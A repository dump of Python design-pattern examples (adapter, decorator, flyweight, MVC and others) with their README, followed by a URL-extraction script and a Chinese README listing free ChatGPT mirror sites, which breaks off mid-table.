Cat, Human, Car) that make different noises. The Adapter class provides a different interface to the original methods that make such noises. So the original interfaces (e.g., bark and meow) are available under a different name: make_noise. *Where is the pattern used practically? The Grok framework uses adapters to make objects work with a particular API without modifying the objects themselves: http://grok.zope.org/doc/current/grok_overview.html#adapters *References: http://ginstrom.com/scribbles/2008/11/06/generic-adapter-class-in-python/ https://sourcemaking.com/design_patterns/adapter http://python-3-patterns-idioms-test.readthedocs.io/en/latest/ChangeInterface.html#adapter *TL;DR Allows the interface of an existing class to be used as another interface. """ from typing import Callable, TypeVar T = TypeVar("T") class Dog: def __init__(self) -> None: self.name = "Dog" def bark(self) -> str: return "woof!" class Cat: def __init__(self) -> None: self.name = "Cat" def meow(self) -> str: return "meow!" class Human: def __init__(self) -> None: self.name = "Human" def speak(self) -> str: return "'hello'" class Car: def __init__(self) -> None: self.name = "Car" def make_noise(self, octane_level: int) -> str: return f"vroom{'!' * octane_level}" class Adapter: """Adapts an object by replacing methods. Usage ------ dog = Dog() dog = Adapter(dog, make_noise=dog.bark) """ def __init__(self, obj: T, **adapted_methods: Callable): """We set the adapted methods in the object's dict.""" self.obj = obj self.__dict__.update(adapted_methods) def __getattr__(self, attr): """All non-adapted calls are passed to the object.""" return getattr(self.obj, attr) def original_dict(self): """Print original object dict.""" return self.obj.__dict__ def main(): """ >>> objects = [] >>> dog = Dog() >>> print(dog.__dict__) {'name': 'Dog'} >>> objects.append(Adapter(dog, make_noise=dog.bark)) >>> objects[0].__dict__['obj'], objects[0].__dict__['make_noise'] (<...Dog object at 0x...>, <bound method Dog.bark of <...Dog object at 0x...>>) >>> print(objects[0].original_dict()) {'name': 'Dog'} >>> cat = Cat() >>> objects.append(Adapter(cat, make_noise=cat.meow)) >>> human = Human() >>> objects.append(Adapter(human, make_noise=human.speak)) >>> car = Car() >>> objects.append(Adapter(car, make_noise=lambda: car.make_noise(3))) >>> for obj in objects: ... print("A {0} goes {1}".format(obj.name, obj.make_noise())) A Dog goes woof! A Cat goes meow! A Human goes 'hello' A Car goes vroom!!! """ if __name__ == "__main__": import doctest doctest.testmod(optionflags=doctest.ELLIPSIS) File: patterns/structural/decorator.py """ *What is this pattern about? The Decorator pattern is used to dynamically add a new feature to an object without changing its implementation. It differs from inheritance because the new feature is added only to that particular object, not to the entire subclass. *What does this example do? This example shows a way to add formatting options (boldface and italic) to a text by appending the corresponding tags (<b> and <i>). Also, we can see that decorators can be applied one after the other, since the original text is passed to the bold wrapper, which in turn is passed to the italic wrapper. *Where is the pattern used practically? The Grok framework uses decorators to add functionalities to methods, like permissions or subscription to an event: http://grok.zope.org/doc/current/reference/decorators.html *References: https://sourcemaking.com/design_patterns/decorator *TL;DR Adds behaviour to object without affecting its class. """ class TextTag: """Represents a base text tag""" def __init__(self, text: str) -> None: self._text = text def render(self) -> str: return self._text class BoldWrapper(TextTag): """Wraps a tag in <b>""" def __init__(self, wrapped: TextTag) -> None: self._wrapped = wrapped def render(self) -> str: return f"<b>{self._wrapped.render()}</b>" class ItalicWrapper(TextTag): """Wraps a tag in <i>""" def __init__(self, wrapped: TextTag) -> None: self._wrapped = wrapped def render(self) -> str: return f"<i>{self._wrapped.render()}</i>" def main(): """ >>> simple_hello = TextTag("hello, world!") >>> special_hello = ItalicWrapper(BoldWrapper(simple_hello)) >>> print("before:", simple_hello.render()) before: hello, world! >>> print("after:", special_hello.render()) after: <i><b>hello, world!</b></i> """ if __name__ == "__main__": import doctest doctest.testmod() File: patterns/structural/flyweight.py """ *What is this pattern about? This pattern aims to minimise the number of objects that are needed by a program at run-time. A Flyweight is an object shared by multiple contexts, and is indistinguishable from an object that is not shared. The state of a Flyweight should not be affected by it's context, this is known as its intrinsic state. The decoupling of the objects state from the object's context, allows the Flyweight to be shared. *What does this example do? The example below sets-up an 'object pool' which stores initialised objects. When a 'Card' is created it first checks to see if it already exists instead of creating a new one. This aims to reduce the number of objects initialised by the program. *References: http://codesnipers.com/?q=python-flyweights https://python-patterns.guide/gang-of-four/flyweight/ *Examples in Python ecosystem: https://docs.python.org/3/library/sys.html#sys.intern *TL;DR Minimizes memory usage by sharing data with other similar objects. """ import weakref class Card: """The Flyweight""" # Could be a simple dict. # With WeakValueDictionary garbage collection can reclaim the object # when there are no other references to it. _pool: weakref.WeakValueDictionary = weakref.WeakValueDictionary() def __new__(cls, value, suit): # If the object exists in the pool - just return it obj = cls._pool.get(value + suit) # otherwise - create new one (and add it to the pool) if obj is None: obj = object.__new__(Card) cls._pool[value + suit] = obj # This row does the part we usually see in `__init__` obj.value, obj.suit = value, suit return obj # If you uncomment `__init__` and comment-out `__new__` - # Card becomes normal (non-flyweight). # def __init__(self, value, suit): # self.value, self.suit = value, suit def __repr__(self): return f"<Card: {self.value}{self.suit}>" def main(): """ >>> c1 = Card('9', 'h') >>> c2 = Card('9', 'h') >>> c1, c2 (<Card: 9h>, <Card: 9h>) >>> c1 == c2 True >>> c1 is c2 True >>> c1.new_attr = 'temp' >>> c3 = Card('9', 'h') >>> hasattr(c3, 'new_attr') True >>> Card._pool.clear() >>> c4 = Card('9', 'h') >>> hasattr(c4, 'new_attr') False """ if __name__ == "__main__": import doctest doctest.testmod() File: patterns/structural/bridge.py """ *References: http://en.wikibooks.org/wiki/Computer_Science_Design_Patterns/Bridge_Pattern#Python *TL;DR Decouples an abstraction from its implementation. """ # ConcreteImplementor 1/2 class DrawingAPI1: def draw_circle(self, x, y, radius): print(f"API1.circle at {x}:{y} radius {radius}") # ConcreteImplementor 2/2 class DrawingAPI2: def draw_circle(self, x, y, radius): print(f"API2.circle at {x}:{y} radius {radius}") # Refined Abstraction class CircleShape: def __init__(self, x, y, radius, drawing_api): self._x = x self._y = y self._radius = radius self._drawing_api = drawing_api # low-level i.e. Implementation specific def draw(self): self._drawing_api.draw_circle(self._x, self._y, self._radius) # high-level i.e. Abstraction specific def scale(self, pct): self._radius *= pct def main(): """ >>> shapes = (CircleShape(1, 2, 3, DrawingAPI1()), CircleShape(5, 7, 11, DrawingAPI2())) >>> for shape in shapes: ... shape.scale(2.5) ... shape.draw() API1.circle at 1:2 radius 7.5 API2.circle at 5:7 radius 27.5 """ if __name__ == "__main__": import doctest doctest.testmod() File: patterns/structural/__init__.py File: patterns/structural/3-tier.py """ *TL;DR Separates presentation, application processing, and data management functions. """ from typing import Dict, KeysView, Optional, Union class Data: """Data Store Class""" products = { "milk": {"price": 1.50, "quantity": 10}, "eggs": {"price": 0.20, "quantity": 100}, "cheese": {"price": 2.00, "quantity": 10}, } def __get__(self, obj, klas): print("(Fetching from Data Store)") return {"products": self.products} class BusinessLogic: """Business logic holding data store instances""" data = Data() def product_list(self) -> KeysView[str]: return self.data["products"].keys() def product_information( self, product: str ) -> Optional[Dict[str, Union[int, float]]]: return self.data["products"].get(product, None) class Ui: """UI interaction class""" def __init__(self) -> None: self.business_logic = BusinessLogic() def get_product_list(self) -> None: print("PRODUCT LIST:") for product in self.business_logic.product_list(): print(product) print("") def get_product_information(self, product: str) -> None: product_info = self.business_logic.product_information(product) if product_info: print("PRODUCT INFORMATION:") print( f"Name: {product.title()}, " + f"Price: {product_info.get('price', 0):.2f}, " + f"Quantity: {product_info.get('quantity', 0):}" ) else: print(f"That product '{product}' does not exist in the records") def main(): """ >>> ui = Ui() >>> ui.get_product_list() PRODUCT LIST: (Fetching from Data Store) milk eggs cheese <BLANKLINE> >>> ui.get_product_information("cheese") (Fetching from Data Store) PRODUCT INFORMATION: Name: Cheese, Price: 2.00, Quantity: 10 >>> ui.get_product_information("eggs") (Fetching from Data Store) PRODUCT INFORMATION: Name: Eggs, Price: 0.20, Quantity: 100 >>> ui.get_product_information("milk") (Fetching from Data Store) PRODUCT INFORMATION: Name: Milk, Price: 1.50, Quantity: 10 >>> ui.get_product_information("arepas") (Fetching from Data Store) That product 'arepas' does not exist in the records """ if __name__ == "__main__": import doctest doctest.testmod() File: patterns/structural/composite.py """ *What is this pattern about? The composite pattern describes a group of objects that is treated the same way as a single instance of the same type of object. The intent of a composite is to "compose" objects into tree structures to represent part-whole hierarchies. Implementing the composite pattern lets clients treat individual objects and compositions uniformly. *What does this example do? The example implements a graphic class,which can be either an ellipse or a composition of several graphics. Every graphic can be printed. *Where is the pattern used practically? In graphics editors a shape can be basic or complex. An example of a simple shape is a line, where a complex shape is a rectangle which is made of four line objects. Since shapes have many operations in common such as rendering the shape to screen, and since shapes follow a part-whole hierarchy, composite pattern can be used to enable the program to deal with all shapes uniformly. *References: https://en.wikipedia.org/wiki/Composite_pattern https://infinitescript.com/2014/10/the-23-gang-of-three-design-patterns/ *TL;DR Describes a group of objects that is treated as a single instance. """ from abc import ABC, abstractmethod from typing import List class Graphic(ABC): @abstractmethod def render(self) -> None: raise NotImplementedError("You should implement this!") class CompositeGraphic(Graphic): def __init__(self) -> None: self.graphics: List[Graphic] = [] def render(self) -> None: for graphic in self.graphics: graphic.render() def add(self, graphic: Graphic) -> None: self.graphics.append(graphic) def remove(self, graphic: Graphic) -> None: self.graphics.remove(graphic) class Ellipse(Graphic): def __init__(self, name: str) -> None: self.name = name def render(self) -> None: print(f"Ellipse: {self.name}") def main(): """ >>> ellipse1 = Ellipse("1") >>> ellipse2 = Ellipse("2") >>> ellipse3 = Ellipse("3") >>> ellipse4 = Ellipse("4") >>> graphic1 = CompositeGraphic() >>> graphic2 = CompositeGraphic() >>> graphic1.add(ellipse1) >>> graphic1.add(ellipse2) >>> graphic1.add(ellipse3) >>> graphic2.add(ellipse4) >>> graphic = CompositeGraphic() >>> graphic.add(graphic1) >>> graphic.add(graphic2) >>> graphic.render() Ellipse: 1 Ellipse: 2 Ellipse: 3 Ellipse: 4 """ if __name__ == "__main__": import doctest doctest.testmod() File: patterns/structural/front_controller.py """ @author: Gordeev Andrey <[email protected]> *TL;DR Provides a centralized entry point that controls and manages request handling. """ from __future__ import annotations from typing import Any class MobileView: def show_index_page(self) -> None: print("Displaying mobile index page") class TabletView: def show_index_page(self) -> None: print("Displaying tablet index page") class Dispatcher: def __init__(self) -> None: self.mobile_view = MobileView() self.tablet_view = TabletView() def dispatch(self, request: Request) -> None: """ This function is used to dispatch the request based on the type of device. If it is a mobile, then mobile view will be called and if it is a tablet, then tablet view will be called. Otherwise, an error message will be printed saying that cannot dispatch the request. """ if request.type == Request.mobile_type: self.mobile_view.show_index_page() elif request.type == Request.tablet_type: self.tablet_view.show_index_page() else: print("Cannot dispatch the request") class RequestController: """front controller""" def __init__(self) -> None: self.dispatcher = Dispatcher() def dispatch_request(self, request: Any) -> None: """ This function takes a request object and sends it to the dispatcher. """ if isinstance(request, Request): self.dispatcher.dispatch(request) else: print("request must be a Request object") class Request: """request""" mobile_type = "mobile" tablet_type = "tablet" def __init__(self, request): self.type = None request = request.lower() if request == self.mobile_type: self.type = self.mobile_type elif request == self.tablet_type: self.type = self.tablet_type def main(): """ >>> front_controller = RequestController() >>> front_controller.dispatch_request(Request('mobile')) Displaying mobile index page >>> front_controller.dispatch_request(Request('tablet')) Displaying tablet index page >>> front_controller.dispatch_request(Request('desktop')) Cannot dispatch the request >>> front_controller.dispatch_request('mobile') request must be a Request object """ if __name__ == "__main__": import doctest doctest.testmod() File: patterns/structural/flyweight_with_metaclass.py import weakref class FlyweightMeta(type): def __new__(mcs, name, parents, dct): """ Set up object pool :param name: class name :param parents: class parents :param dct: dict: includes class attributes, class methods, static methods, etc :return: new class """ dct["pool"] = weakref.WeakValueDictionary() return super().__new__(mcs, name, parents, dct) @staticmethod def _serialize_params(cls, *args, **kwargs): """ Serialize input parameters to a key. Simple implementation is just to serialize it as a string """ args_list = list(map(str, args)) args_list.extend([str(kwargs), cls.__name__]) key = "".join(args_list) return key def __call__(cls, *args, **kwargs): key = FlyweightMeta._serialize_params(cls, *args, **kwargs) pool = getattr(cls, "pool", {}) instance = pool.get(key) if instance is None: instance = super().__call__(*args, **kwargs) pool[key] = instance return instance class Card2(metaclass=FlyweightMeta): def __init__(self, *args, **kwargs): # print('Init {}: {}'.format(self.__class__, (args, kwargs))) pass if __name__ == "__main__": instances_pool = getattr(Card2, "pool") cm1 = Card2("10", "h", a=1) cm2 = Card2("10", "h", a=1) cm3 = Card2("10", "h", a=2) assert (cm1 == cm2) and (cm1 != cm3) assert (cm1 is cm2) and (cm1 is not cm3) assert len(instances_pool) == 2 del cm1 assert len(instances_pool) == 2 del cm2 assert len(instances_pool) == 1 del cm3 assert len(instances_pool) == 0 File: patterns/structural/mvc.py """ *TL;DR Separates data in GUIs from the ways it is presented, and accepted. """ from abc import ABC, abstractmethod class Model(ABC): @abstractmethod def __iter__(self): pass @abstractmethod def get(self, item): """Returns an object with a .items() call method that iterates over key,value pairs of its information.""" pass @property @abstractmethod def item_type(self): pass class ProductModel(Model): class Price(float): """A polymorphic way to pass a float with a particular __str__ functionality.""" def __str__(self): return f"{self:.2f}" products = { "milk": {"price": Price(1.50), "quantity": 10}, "eggs": {"price": Price(0.20), "quantity": 100}, "cheese": {"price": Price(2.00), "quantity": 10}, } item_type = "product" def __iter__(self): yield from self.products def get(self, product): try: return self.products[product] except KeyError as e: raise KeyError(str(e) + " not in the model's item list.") class View(ABC): @abstractmethod def show_item_list(self, item_type, item_list): pass @abstractmethod def show_item_information(self, item_type, item_name, item_info): """Will look for item information by iterating over key,value pairs yielded by item_info.items()""" pass @abstractmethod def item_not_found(self, item_type, item_name): pass class ConsoleView(View): def show_item_list(self, item_type, item_list): print(item_type.upper() + " LIST:") for item in item_list: print(item) print("") @staticmethod def capitalizer(string): return string[0].upper() + string[1:].lower() def show_item_information(self, item_type, item_name, item_info): print(item_type.upper() + " INFORMATION:") printout = "Name: %s" % item_name for key, value in item_info.items(): printout += ", " + self.capitalizer(str(key)) + ": " + str(value) printout += "\n" print(printout) def item_not_found(self, item_type, item_name): print(f'That {item_type} "{item_name}" does not exist in the records') class Controller: def __init__(self, model, view): self.model = model self.view = view def show_items(self): items = list(self.model) item_type = self.model.item_type self.view.show_item_list(item_type, items) def show_item_information(self, item_name): """ Show information about a {item_type} item. :param str item_name: the name of the {item_type} item to show information about """ try: item_info = self.model.get(item_name) except Exception: item_type = self.model.item_type self.view.item_not_found(item_type, item_name) else: item_type = self.model.item_type self.view.show_item_information(item_type, item_name, item_info) def main(): """ >>> model = ProductModel() >>> view = ConsoleView() >>> controller = Controller(model, view) >>> controller.show_items() PRODUCT LIST: milk eggs cheese <BLANKLINE> >>> controller.show_item_information("cheese") PRODUCT INFORMATION: Name: cheese, Price: 2.00, Quantity: 10 <BLANKLINE> >>> controller.show_item_information("eggs") PRODUCT INFORMATION: Name: eggs, Price: 0.20, Quantity: 100 <BLANKLINE> >>> controller.show_item_information("milk") PRODUCT INFORMATION: Name: milk, Price: 1.50, Quantity: 10 <BLANKLINE> >>> controller.show_item_information("arepas") That product "arepas" does not exist in the records """ if __name__ == "__main__": import doctest doctest.testmod()
python-patterns =============== A collection of design patterns and idioms in Python. Remember that each pattern has its own trade-offs. And you need to pay attention more to why you're choosing a certain pattern than to how to implement it. Current Patterns ---------------- __Creational Patterns__: | Pattern | Description | |:-------:| ----------- | | [abstract_factory](patterns/creational/abstract_factory.py) | use a generic function with specific factories | | [borg](patterns/creational/borg.py) | a singleton with shared-state among instances | | [builder](patterns/creational/builder.py) | instead of using multiple constructors, builder object receives parameters and returns constructed objects | | [factory](patterns/creational/factory.py) | delegate a specialized function/method to create instances | | [lazy_evaluation](patterns/creational/lazy_evaluation.py) | lazily-evaluated property pattern in Python | | [pool](patterns/creational/pool.py) | preinstantiate and maintain a group of instances of the same type | | [prototype](patterns/creational/prototype.py) | use a factory and clones of a prototype for new instances (if instantiation is expensive) | __Structural Patterns__: | Pattern | Description | |:-------:| ----------- | | [3-tier](patterns/structural/3-tier.py) | data<->business logic<->presentation separation (strict relationships) | | [adapter](patterns/structural/adapter.py) | adapt one interface to another using a white-list | | [bridge](patterns/structural/bridge.py) | a client-provider middleman to soften interface changes | | [composite](patterns/structural/composite.py) | lets clients treat individual objects and compositions uniformly | | [decorator](patterns/structural/decorator.py) | wrap functionality with other functionality in order to affect outputs | | [facade](patterns/structural/facade.py) | use one class as an API to a number of others | | [flyweight](patterns/structural/flyweight.py) | transparently reuse existing instances of objects with similar/identical state | | [front_controller](patterns/structural/front_controller.py) | single handler requests coming to the application | | [mvc](patterns/structural/mvc.py) | model<->view<->controller (non-strict relationships) | | [proxy](patterns/structural/proxy.py) | an object funnels operations to something else | __Behavioral Patterns__: | Pattern | Description | |:-------:| ----------- | | [chain_of_responsibility](patterns/behavioral/chain_of_responsibility.py) | apply a chain of successive handlers to try and process the data | | [catalog](patterns/behavioral/catalog.py) | general methods will call different specialized methods based on construction parameter | | [chaining_method](patterns/behavioral/chaining_method.py) | continue callback next object method | | [command](patterns/behavioral/command.py) | bundle a command and arguments to call later | | [iterator](patterns/behavioral/iterator.py) | traverse a container and access the container's elements | | [iterator](patterns/behavioral/iterator_alt.py) (alt. impl.)| traverse a container and access the container's elements | | [mediator](patterns/behavioral/mediator.py) | an object that knows how to connect other objects and act as a proxy | | [memento](patterns/behavioral/memento.py) | generate an opaque token that can be used to go back to a previous state | | [observer](patterns/behavioral/observer.py) | provide a callback for notification of events/changes to data | | [publish_subscribe](patterns/behavioral/publish_subscribe.py) | a source syndicates events/data to 0+ registered listeners | | [registry](patterns/behavioral/registry.py) | keep track of all subclasses of a given class | | [specification](patterns/behavioral/specification.py) | business rules can be recombined by chaining the business rules together using boolean logic | | [state](patterns/behavioral/state.py) | logic is organized into a discrete number of potential states and the next state that can be transitioned to | | [strategy](patterns/behavioral/strategy.py) | selectable operations over the same data | | [template](patterns/behavioral/template.py) | an object imposes a structure but takes pluggable components | | [visitor](patterns/behavioral/visitor.py) | invoke a callback for all items of a collection | __Design for Testability Patterns__: | Pattern | Description | |:-------:| ----------- | | [dependency_injection](patterns/dependency_injection.py) | 3 variants of dependency injection | __Fundamental Patterns__: | Pattern | Description | |:-------:| ----------- | | [delegation_pattern](patterns/fundamental/delegation_pattern.py) | an object handles a request by delegating to a second object (the delegate) | __Others__: | Pattern | Description | |:-------:| ----------- | | [blackboard](patterns/other/blackboard.py) | architectural model, assemble different sub-system knowledge to build a solution, AI approach - non gang of four pattern | | [graph_search](patterns/other/graph_search.py) | graphing algorithms - non gang of four pattern | | [hsm](patterns/other/hsm/hsm.py) | hierarchical state machine - non gang of four pattern | Videos ------ [Design Patterns in Python by Peter Ullrich](https://www.youtube.com/watch?v=bsyjSW46TDg) [Sebastian Buczyński - Why you don't need design patterns in Python?](https://www.youtube.com/watch?v=G5OeYHCJuv0) [You Don't Need That!](https://www.youtube.com/watch?v=imW-trt0i9I) [Pluggable Libs Through Design Patterns](https://www.youtube.com/watch?v=PfgEU3W0kyU) Contributing ------------ When an implementation is added or modified, please review the following guidelines: ##### Docstrings Add module level description in form of a docstring with links to corresponding references or other useful information. Add "Examples in Python ecosystem" section if you know some. It shows how patterns could be applied to real-world problems. [facade.py](patterns/structural/facade.py) has a good example of detailed description, but sometimes the shorter one as in [template.py](patterns/behavioral/template.py) would suffice. ##### Python 2 compatibility To see Python 2 compatible versions of some patterns please check-out the [legacy](https://github.com/faif/python-patterns/tree/legacy) tag. ##### Update README When everything else is done - update corresponding part of README. ##### Travis CI Please run the following before submitting a patch - `black .` This lints your code. Then either: - `tox` or `tox -e ci37` This runs unit tests. see tox.ini for further details. - If you have a bash compatible shell use `./lint.sh` This script will lint and test your code. This script mirrors the CI pipeline actions. You can also run `flake8` or `pytest` commands manually. Examples can be found in `tox.ini`. ## Contributing via issue triage [![Open Source Helpers](https://www.codetriage.com/faif/python-patterns/badges/users.svg)](https://www.codetriage.com/faif/python-patterns) You can triage issues and pull requests which may include reproducing bug reports or asking for vital information, such as version numbers or reproduction instructions. If you would like to start triaging issues, one easy way to get started is to [subscribe to python-patterns on CodeTriage](https://www.codetriage.com/faif/python-patterns). ## AI codebase assistance ## The folks at Mutable.ai have built an AI assistant that is codebase-aware. Give it a try [![Mutable.ai Auto Wiki](https://img.shields.io/badge/Auto_Wiki-Mutable.ai-blue)](https://wiki.mutable.ai/faif/python-patterns)
awesome-free-chatgpt
da28eb22153b4a34eae188335a27f14d411f7d6c
File: convert.py # convert the urls in README.md to json format, and save it to urls.json, colapse the same urls, remove the last `/` in the url import json import re # Read the content of README.md with open("README.md", "r", encoding="utf-8") as file: content = file.read() # Stop reading when reaching a line that contains '### 🚫 已失效' content = content.split('### 🚫 已失效')[0] # Find all URLs in the content [] urls = re.findall(r'http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\\(\\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+(?=\])', content) # urls = re.findall(r'(?<!~~)(http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\\(\\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+)(?!~~)', content) # Remove the last '/' in the URL and collapse the same URLs unique_urls = [] for url in urls: url = url[:-1] if url.endswith('/') else url if url not in unique_urls: unique_urls.append(url) # Save the URLs to urls.json with open("urls.json", "w") as file: json.dump(unique_urls, file)
# Awesome Free ChatGPT ![Awesome](https://cdn.jsdelivr.net/gh/LiLittleCat/PicBed/svg/awesome/badge.svg) [![English](https://cdn.jsdelivr.net/gh/LiLittleCat/PicBed/svg/lang/english.svg)](README_en.md) ![website count](https://img.shields.io/badge/websites-297-blue?style=flat) ![last-commit](https://img.shields.io/github/last-commit/LiLittleCat/awesome-free-chatgpt?style=flat&amp;label=last&nbsp;commit) > 4 月 1 日,OpenAI 宣布可以不登录即可使用 ChatGPT 3.5,参阅 [Start using ChatGPT instantly](https://openai.com/blog/start-using-chatgpt-instantly)。 🎁 免费的 ChatGPT (<https://chatgpt.com>)(<https://chat.openai.com>) 镜像网站列表,以及更多免费资源,持续更新。 此处列出的网站均来源于互联网,请注意不要在这些网站上输入任何个人敏感信息。 🌈 欢迎贡献 - [添加镜像站点](https://github.com/LiLittleCat/awesome-free-chatgpt/issues/new?assignees=LiLittleCat&labels=&projects=&template=%E6%B7%BB%E5%8A%A0%E9%95%9C%E5%83%8F%E7%AB%99%E7%82%B9.md&title=%E6%B7%BB%E5%8A%A0%E9%95%9C%E5%83%8F%E7%AB%99%E7%82%B9) - [反馈站点失效](https://github.com/LiLittleCat/awesome-free-chatgpt/issues/new?assignees=LiLittleCat&labels=&projects=&template=%E5%8F%8D%E9%A6%88%E7%AB%99%E7%82%B9%E5%A4%B1%E6%95%88.md&title=%E5%8F%8D%E9%A6%88%E7%AB%99%E7%82%B9%E5%A4%B1%E6%95%88) - 更多(todo) 如果您发现此项目有用,不要忘记 star 🌟,您的支持是我前进的动力。 --- | 🏆 赞助商 🏆 | |:------------------------------------------------------------------------------------------------:| | 👉 [WikeAI](https://wike.ai/) 支持 GPT4、Claude3、GPT-3.5-turbo(免费无限制)、Gemini Pro(免费无限制)、助手/绘画、语音合成。 | --- ## 目录 <!-- TOC --> * [Awesome Free ChatGPT](#awesome-free-chatgpt) * [目录](#目录) * [💬 ChatGPT 镜像列表](#-chatgpt-镜像列表) * [🗨️ ChatGPT 替代方案](#-chatgpt-替代方案) * [📚 更多...](#-更多) * [💿 构建你自己的 ChatGPT 镜像](#-构建你自己的-chatgpt-镜像) * [💡 提示词(Prompt)](#-提示词prompt) * [📝 自建内容库](#-自建内容库) * [💻 开发者工具](#-开发者工具) * [🌟 Star History](#-star-history) * [💞 Contributors](#-contributors) <!-- TOC --> ## 💬 ChatGPT 镜像列表 > 注: > > 1. 排序规则,见 [#80](https://github.com/LiLittleCat/awesome-free-chatgpt/discussions/80) > 2. 标签含义 > - 🆓完全免费,打开即用 > - 🔓有免费额度 > - 🔒需要登陆 > - 🔑需要输入 API Key > - 💰需要充值 > - 👀需要关注公众号 > - 💪支持 GPT4 > - 🧰不仅仅是 Chat,支持其他模型或其他功能 > - 🌎需要国际网络 > - 🏆赞助商 <!-- normal-begin --> <table> <thead> <tr> <th>序号</th> <th>网站</th> <th>标签</th> <th>添加时间</th> <th>备注</th> </tr> </thead> <tbody> <tr> <td>1</td> <td> <a href="https://chat5.aiyunos.top" target="_blank">https://chat5.aiyunos.top</a> <br> </td> <td> 🏆 🆓 💪 🧰 </td> <td>2023-11-15</td> <td></td> </tr> <tr> <td>2</td> <td> <a href="https://chat.tinycms.xyz:3002" target="_blank">https://chat.tinycms.xyz:3002</a> <br> </td> <td> 🏆 🆓 💪 </td> <td>2023-08-14</td> <td></td> </tr> <tr> <td>3</td> <td> <a href="https://lite.icoding.ink/" target="_blank">https://lite.icoding.ink/</a> <br> </td> <td> 🆓 💪 🧰 </td> <td>2024-07-23</td> <td></td> </tr> <tr> <td>4</td> <td> <a href="https://chat.ai365vip.com/" target="_blank">https://chat.ai365vip.com/</a> <br> </td> <td> 🆓 💪 🧰 </td> <td>2024-07-01</td> <td></td> </tr> <tr> <td>5</td> <td> <a href="https://myai.asia/" target="_blank">https://myai.asia/</a> <br> </td> <td> 🆓 💪 🧰 </td> <td>2024-06-23</td> <td></td> </tr> <tr> <td>6</td> <td> <a href="https://free.netfly.top/" target="_blank">https://free.netfly.top/</a> <br> </td> <td> 🆓 💪 </td> <td>2024-07-21</td> <td></td> </tr> <tr> <td>7</td> <td> <a href="https://claude.free2gpt.xyz" target="_blank">https://claude.free2gpt.xyz</a> <br> </td> <td> 🆓 💪 </td> <td>2024-07-05</td> <td>免费 Claude 3.5 Sonnet,限 120 次/天</td> </tr> <tr> <td>8</td> <td> <a href="https://origin.eqing.tech/" target="_blank">https://origin.eqing.tech/</a> <br> </td> <td> 🆓 💪 </td> <td>2024-06-27</td> <td></td> </tr> <tr> <td>9</td> <td> <a href="https://www.yeschat.ai/zh-CN/gpt-4o" target="_blank">https://www.yeschat.ai/zh-CN/gpt-4o</a> <br> </td> <td> 🆓 💪 </td> <td>2024-06-13</td> <td></td> </tr> <tr> <td>10</td> <td> <a href="https://chat.freeuse.top/" target="_blank">https://chat.freeuse.top/</a> <br> </td> <td> 🆓 💪 </td> <td>2024-04-30</td> <td></td> </tr> <tr> <td>11</td> <td> <a href="https://aitopk.com/" target="_blank">https://aitopk.com/</a> <br> </td> <td> 🆓 💪 </td> <td>2024-03-21</td> <td></td> </tr> <tr> <td>12</td> <td> <a href="https://sharedchat.cn/shared.html" target="_blank">https://sharedchat.cn/shared.html</a> <br> </td> <td> 🆓 💪 </td> <td>2024-02-21</td> <td></td> </tr> <tr> <td>13</td> <td> <a href="https://chat.icoding.ink/pc-chat/#/questions" target="_blank">https://chat.icoding.ink/pc-chat/#/questions</a> <br> </td> <td> 🆓 💪 </td> <td>2024-02-06</td> <td></td> </tr> <tr> <td>14</td> <td> <a href="https://www.zxf7460.cn/" target="_blank">https://www.zxf7460.cn/</a> <br> </td> <td> 🆓 🔓 💪 🧰 </td> <td>2024-06-13</td> <td></td> </tr> <tr> <td>15</td> <td> <a href="https://ai.myym.fun" target="_blank">https://ai.myym.fun</a> <br> </td> <td> 🆓 💪 🧰 🌎 </td> <td>2024-06-06</td> <td></td> </tr> <tr> <td>16</td> <td> <a href="https://chatnio.liujiarong.top/" target="_blank">https://chatnio.liujiarong.top/</a> <br> </td> <td> 🆓 🧰 </td> <td>2024-05-20</td> <td></td> </tr> <tr> <td>17</td> <td> <a href="https://www.ichat2019.com/" target="_blank">https://www.ichat2019.com/</a> <br> </td> <td> 🆓 🔓 💪 🧰 </td> <td>2024-02-01</td> <td></td> </tr> <tr> <td>18</td> <td> <a href="http://nmwaicg.top/" target="_blank">http://nmwaicg.top/</a> <br> </td> <td> 🆓 🔓 💪 🧰 </td> <td>2024-01-27</td> <td></td> </tr> <tr> <td>19</td> <td> <a href="https://newpc.icoding.ink/?debug=true" target="_blank">https://newpc.icoding.ink/?debug=true</a> <br> </td> <td> 🆓 🧰 </td> <td>2023-10-18</td> <td></td> </tr> <tr> <td>20</td> <td> <a href="https://www.opkfc.com/" target="_blank">https://www.opkfc.com/</a> <br> </td> <td> 🆓 </td> <td>2024-06-29</td> <td></td> </tr> <tr> <td>21</td> <td> <a href="https://chatgpt4online.org/chatgpt-free-online/#chat" target="_blank">https://chatgpt4online.org/chatgpt-free-online/#chat</a> <br> </td> <td> 🆓 </td> <td>2024-06-13</td> <td></td> </tr> <tr> <td>22</td> <td> <a href="https://chatgptplus.cn/" target="_blank">https://chatgptplus.cn/</a> <br> </td> <td> 🆓 </td> <td>2024-06-01</td> <td></td> </tr> <tr> <td>23</td> <td> <a href="https://www.51supergpt.com/" target="_blank">https://www.51supergpt.com/</a> <br> </td> <td> 🆓 </td> <td>2024-05-30</td> <td>GPT3.5 授权码 51supergpt.com</td> </tr> <tr> <td>24</td> <td> <a href="https://tudouai.chat/chat" target="_blank">https://tudouai.chat/chat</a> <br> </td> <td> 🆓 </td> <td>2024-05-28</td> <td></td> </tr> <tr> <td>25</td> <td> <a href="https://robot.liujiarong.me" target="_blank">https://robot.liujiarong.me</a> <br> </td> <td> 🆓 </td> <td>2024-05-27</td> <td></td> </tr> <tr> <td>26</td> <td> <a href="https://robot.liujiarong.top" target="_blank">https://robot.liujiarong.top</a> <br> </td> <td> 🆓 </td> <td>2024-05-18</td> <td></td> </tr> <tr> <td>27</td> <td> <a href="https://chat.mynanian.top/" target="_blank">https://chat.mynanian.top/</a> <br> </td> <td> 🆓 </td> <td>2024-05-11</td> <td></td> </tr> <tr> <td>28</td> <td> <a href="https://free.icoding.ink/index2.html" target="_blank">https://free.icoding.ink/index2.html</a> <br> </td> <td> 🆓 </td> <td>2024-05-11</td> <td></td> </tr> <tr> <td>29</td> <td> <a href="https://chat.programapps.top/" target="_blank">https://chat.programapps.top/</a> <br> </td> <td> 🆓 </td> <td>2024-04-16</td> <td></td> </tr> <tr> <td>30</td> <td> <a 